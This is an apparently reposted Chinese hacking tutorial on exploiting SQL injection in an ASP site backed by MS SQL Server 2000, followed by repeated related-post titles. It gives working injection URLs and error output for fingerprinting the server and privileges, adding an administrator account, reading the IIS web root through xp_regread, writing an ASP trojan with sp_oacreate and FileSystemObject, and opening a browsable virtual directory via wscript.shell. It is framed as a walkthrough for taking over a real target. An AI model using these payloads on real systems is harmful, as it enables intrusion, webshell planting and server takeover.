榨乾MS SQL最後一滴血

風雲變換的網路，網路

安全讓人們不能不關注它。資料庫，讓我們不得不想起強大的oracle，ms sql。微軟的

漏洞最多，今天就用sql injection來讓ms sql為我們好好的工作。

ms sql內建函式介紹：

@@version 獲得windows的版本號，ms sql的版本號，補丁。 user_name() 得到當前系統的連線使用者 db_name() 得到當前連線的資料庫 host_name() 得到當前主機的名稱

這些資訊有助我們對系統進行簡單的了解

好，下面我們就開始吧！

語句： http：//.***.***/list.asp?classid=1'返回資訊：microsoft ole db provider for sql server 錯誤 '80040e14' 字串 ' order by id desc' 之前有未閉合的引號。 /list.asp，行290

從這裡未閉合的引號（「』」），我們可以確定存在sql injection。發現在漏洞當然接著走了，利用以上介紹的函式為我們工作了：

相關的資訊出來了，ms server a

dvanced server 2000+sp4, sql 2000+sp3，從ms sql server 後面的8.00.760可看出是sp3補丁。看了伺服器的資訊，接下應該了解資料庫的許可權了：

語句：http：//.***.***/list.asp?classid=1 and user_name()=』dbo』返回：正常返回的資訊

確定是許可權是dbo，從表面dbo許可權的連線使用者經常是涉及sysadmin伺服器角色成員。說明資料庫伺服器角色成員組預設是在每個資料庫增加乙個dbo使用者。

返回原理根1=1，1=2相似..這裡只是許可權測試，我們也把它爆出來看看：

語句： http：//.***.***/list.asp?classid=1 and 0<>(select user_name())—返回： microsoft ole db provider for sql server 錯誤 '80040e07' 將 nvarchar 值 'dbo' 轉換為資料型別為 int 的列時發生語法錯誤。 /list.asp，行290

說明連線資料庫的使用者許可權很高，可以確定是伺服器角色組中的成員。

語句：http：//.***.***/list.asp?classid=1 and 0<>(select db_name())—返回：microsoft ole db provider for sql server 錯誤 '80040e07' 將 nvarchar 值 'gameimgsys' 轉換為資料型別為 int 的列時發生語法錯誤。 /list.asp，行290

這樣就可以爆出當前的資料庫。得到這麼高許可權的資料庫連線成員，我們當然想直接得到webshell，或是直接拿到nt admin。nt admin取決於當前伺服器的配置，如果配置不合理的伺服器，我們要直接拿nt admin，拿nt admin就要用到：

mssql內建儲存過程：

sp_oacreate (通過它，危害很得更大，但是需要有sysadmins許可權才可能使用) sp_oageterrorinfo sp_oagetproperty sp_oamethod sp_oasetproperty sp_setpropertysp_oastop

由於ms sql一次可以執行多語句，使得我們有機會使用更多的語句。

建立使用者了，語句後再加個*** localgroup administrators **test /add加到管理組中。如果對方的機子開著3389埠，或ipc的話，那接下來的事，就不用我多說了。

遇到專業型主機，只開乙個80埠，那應該怎麼辦呢？當然，我們還是可能拿到webshell，再慢慢滲透的。

由於許可權高，我們可能先建表，寫入

asp木馬的資料再通過makewe

btask,得到websehll.手工寫入的程式太過於繁鎖，上傳webshell最大的問題還是網頁目錄，現在網上已經有現成的工具通過backup，和maskwebtask的工具得到webshell了。以下推薦，獲取網頁路徑（通過儲存過程達到對登錄檔的讀取）：

利用內建儲存過程 xp_regread(讀取登錄檔鍵值，許可權public)：

語句：http：//.***.***/list.asp?classid=1;create table newtable(id int identity(1,1),paths varchar(500)) declare @test varchar(20) exec master..xp_regread @rootkey='hkey_local_machine', @key='system/currentcontrolset/services/w3svc/parameters/virtual roots/', @value_name='/', values=@test output insert into paths(path) values(@test)

iis的預設路徑的在登錄檔中hkey_local_machine/ system/currentcontrolset/services/w3svc/parameters/virtual roots/

利用爆字段將資料庫的值讀出來：

語句：http：//.***.***/list.asp?classid=1 and 0<>(select top 1 paths from newtable)--返回： microsoft ole db provider for odbc drivers 錯誤 '80040e07' [microsoft][odbc sql server driver][sql server]將 varchar 值 'e：/,,201' 轉換為資料型別為 int 的列時發生語法錯誤。

這說明網頁目錄在e：/，接下來也可以利用fso直接寫入asp木馬（提示必須擁用sysadmin許可權才可使用fso和fso開入的前提下）：

語句：http：//.***.***/list.asp?class=1;declare%20@o%20int,%20@f%20int,%20@t%20int,%20@ret%20int%20exec%20sp_oacreate%20'scripting.filesystemobject',%20@o%20out%20exec%20sp_oamethod%20@o,%20'createtextfile',%20@f%20out,%20'e：//test.asp',1%20exec%20@ret%20=%20sp_oamethod%20@f,%20'writeline',%20null,%20'on error resume next'--

在e：/下建立乙個test.asp並寫入on error resume next語句：

在e：//test.asp增加一行記錄，記錄為asp horse，整個完整木馬可能這樣寫入。(%百分號要用%25替**入)。如果得不到網頁目錄，怎麼辦呢？前提你要猜到**是否使用預設web，或者使用網域名稱作為web。

declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', null,』 cscript.exe c：/i***pub/root/mkwebdir.vbs -w "預設 web 站點" -v "e","e：/"』

在預設的web站點下建立乙個虛擬目錄e，指向e：盤下。

declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', null,』 cscript.exe c：/i***pub/root/chaccess.vbs -a w3svc/1/root/e +browse』

給虛擬目錄e加上瀏覽屬性不錯吧。給自己開虛擬服務。想那些網頁目錄路徑，頭都快破了。這下給自己乙個天開眼了。那傳webshell利用ms sql為我們的工作告了一段落了，接下來工作應該由你來了。

榨乾MS SQL最後一滴血

csu oj 1339 最後一滴血

《中谷專案》第一滴血

駱駝的最後一滴眼淚

榨乾MS SQL最後一滴血

csu oj 1339 最後一滴血

《中谷專案》 第一滴血

駱駝的最後一滴眼淚

相關推薦

《中谷專案》第一滴血